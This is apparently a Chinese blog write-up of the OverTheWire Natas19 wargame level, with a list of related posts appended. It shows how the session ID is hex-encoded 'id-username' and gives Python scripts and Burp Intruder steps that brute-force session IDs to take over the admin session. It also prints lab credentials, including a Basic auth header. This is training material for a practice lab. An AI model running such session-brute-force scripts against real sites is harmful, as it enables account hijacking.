Natas19:

提示,与上一题源码类似,只是PHPSESSID不连续。随便输入username和password,抓包观察PHPSESSID,发现是输入的信息,按照id-username的格式,由ascill码转化为16进制,猜测正确PHPSESSID,应该是id-admin,用python构造字典,burp抓包后使用intruder模块,导入字典后进行暴力破解。

方法1:burp破解

1.抓包得到PHPSESSID=3436322d61646d696e

2.将PHPSESSID进行ASCII hex解码(ascill码转化为16进制),发现其值为id-username格式。可以多次抓包尝试,根据结果猜测正确PHPSESSID,应该是id-admin。

3.由于-admin对应的十六进制是2d61646d696e不变,因此我们只需要构造前面的id对应的十六进制即可。0-9十个十位数对应的十六进制为30-39,我们用python构造字典。

字典脚本(生成数字001-699的16进制):

a = []

for i in range(30,37):

    for j in range(30,40):

        for k in range(30,40):

            a.append( '%d%d%d'%(i,j,k))

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

由于前100个id是0-99而不是000-099,我们使用notpad++手动将前100个id生成的16进制数前面的30去掉,得到最终的字典。





1.txt


字典进阶:


上面生成字典的方法太麻烦了,下面脚本可以帮助我们直接生成PHPSESSID值的字典。


Python2.x脚本




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(str(i))+"2d61646d696e"

    a.append(k)

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

# python中,函数 hexlify 作用是返回的二进制数据的十六进制表示。

# 每个字节的数据转换成相应的 2 位十六进制表示。因此产生的字符串是原数据的两倍长度。

# unhexlify 则执行反向操作。




Python3.x脚本:




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(bytes(str(i).encode()))+b"2d61646d696e"

    a.append(k.decode())

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")




关于Python2和Python3的字符编码与界解码问题,看这里


4.下面使用burp开始爆破:








如上图,这个正确结果的length比较特别,既不是所有结果中最长的,也不是最短的,而是一个中间数。我是第一次遇到这种情况,害我找了半天。


另外,如果不想使用python生成脚本,可以直接使用burp的intruder模块中的Cluster bomb模式,将PHPSESSID值的前六位数做3个payload配置,进行爆破。












得到flag:




You are an admin. The credentials for the next level are:

Username: natas20

Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF




方法2:python破解




# coding=utf-8

import requests

import binascii

url = "http://natas19.natas.labs.overthewire.org/"

payload = {"username":"admin","password":"123"}

for i in range(640):

    headers = {"Cookie":"PHPSESSID="+binascii.hexlify(str(i))+"2d61646d696e","Authorization":"Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="}

    req = requests.post(url,params=payload,headers=headers)

    if "You are logged in as a regular user"  in req.text:

        # print(i) #打印i,查看进度

        continue

    else:

        print(i)

        print(req.text)

        exit()







flag:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF


缺点:速度太慢了,可以考虑使用多线程


参考:


https://www.cnblogs.com/ichunqiu/p/9554885.html
https://www.cnblogs.com/liqiuhao/p/6859052.html
												


											
Natas19 Writeup(Session登录,常见编码,暴力破解)的更多相关文章
	

    
						
  1. 服务认证暴力破解工具Crowbar
		
    服务认证暴力破解工具Crowbar   Crowbar是Kali Linux新增的一款服务认证暴力破解工具.该工具支持OpenVPN.RDP.SSH和VNC服务.该工具具备常见的暴力破解功能,如主机字 ...
    
		
    2. 
								
  2. Natas18 Writeup(Session登录,暴力破解)
		
    Natas18: 一个登录界面,查看源码,发现没有连接数据库,使用Session登录,且$maxid设定了不大的上限,选择采取爆破. 源码解析: <html> <head> & ...
    
		
    3. 
						
  3. ssh访问控制,多次失败登录即封掉IP,防止暴力破解
		
    ssh访问控制,多次失败登录即封掉IP,防止暴力破解 一.系统:Centos6.3 64位 二.方法:读取/var/log/secure,查找关键字 Failed,例如(注:文中的IP地址特意做了删减 ...
    
		
    4. 
						
  4. 忘记秘密利用python模拟登录暴力破解秘密
		
    忘记秘密利用python模拟登录暴力破解秘密: #encoding=utf-8 import itertools import string import requests def gen_pwd_f ...
    
		
    5. 
						
  5. [转帖]利用hydra(九头蛇)暴力破解内网windows登录密码
		
    利用hydra(九头蛇)暴力破解内网windows登录密码 https://blog.csdn.net/weixin_37361758/article/details/77939070 尝试了下 能够 ...
    
		
    6. 
						
  6. DEDE暴力破解后台登录页面
		
    DEDE暴力破解后台登录页面 #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ '' ...
    
		
    7. 
						
  7. Linux用root强制踢掉已登录用户;用fail2ban阻止ssh暴力破解root密码
		
    Linux用root强制踢掉已登录用户   首先使用w命令查看所有在线用户: [root@VM_152_184_centos /]# w 20:50:14 up 9 days, 5:58, 3 use ...
    
		
    8. 
						
  8. openssh安装、设置指定端口号、免密码登录、变量传递、防暴力破解
		
    首先确保机器挂在好光盘镜像,然后查看软件包信息 [root@xuegod63 ~]# df -hFilesystem      Size  Used Avail Use% Mounted on/dev ...
    
		
    9. 
						
  9. 暴力破解 安鸾 Writeup
		
    前三题可以使用hydra进行破解 hydra使用教程 https://www.cnblogs.com/zhaijiahui/p/8371336.html D:\soft\hydra-windows&g ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. python django ORM
			
    1.在models.py中创创建类 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db imp ...
    
			
    2. 
						
  2. 吴裕雄--天生自然 R语言开发学习:中级绘图(续一)
			
    #------------------------------------------------------------------------------------# # R in Action ...
    
			
    3. 
						
  3. 两种HTTP请求方法:GET和POST的区别
			
    之前在一些开发者平台使用网页调用API时,一再提到两种请求方法GET和POST,所以就去了解了下.那么这又不得不提到HTTP了! 一.什么是 HTTP? 超文本传输协议(HTTP)的设计目的是保证客户 ...
    
			
    4. 
						
  4. Mac下好玩的终端命令
			
    figlet brew install figlet cowsay brew install cowsaycowsay -l: 查看所有可用动物cowsay -f daemon hello world ...
    
			
    5. 
						
  5. React使用笔记2--创建登录组件
			
    文章目录 最近在学习使用React作为前端的框架,<React使用笔记>系列用于记录过程中的一些使用和解决方法.本文记录搭建登录页面的过程. 根据产品规划划分模块 主要页面逻辑 在这里,本 ...
    
			
    6. 
						
  6. AI:是猫还是狗,这是个问题
			
    如果你不喜欢小猫和小狗,你可能不知道他们具体是哪一种品种,但是一般来说,你都能区分出这是猫还是狗,猫和狗的特征还是不一样的,那我们如何用机器学习的方法训练一个网络区分猫狗呢? 我们选用的是 Kaggl ...
    
			
    7. 
						
  7. 一篇文章带您读懂List集合(源码分析)
			
    今天要分享的Java集合是List,主要是针对它的常见实现类ArrayList进行讲解 内容目录 什么是List核心方法源码剖析1.文档注释2.构造方法3.add()3.remove()如何提升Arr ...
    
			
    8. 
						
  8. [红日安全]Web安全Day4 - SSRF实战攻防
			
    本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目 ...
    
			
    9. 
						
  9. NSURLSession的前世今生
			
    系统网络框架架构图 前世-NSURLConnection NSURLConnection是苹果提供的原生网络访问类,已经有10多年的历史了,它从 iOS 2.0 开始,一直到iOS9被废弃.异步方法在 ...
    
			
    10. 
						
  10. 关于Js的那些面试题
			
    1.javascript的typeof返回哪些数据类型 number string boolean Object function underfind 2.例举3种强制类型转换和2种隐式类型转换?强制 ...
    
			
    11.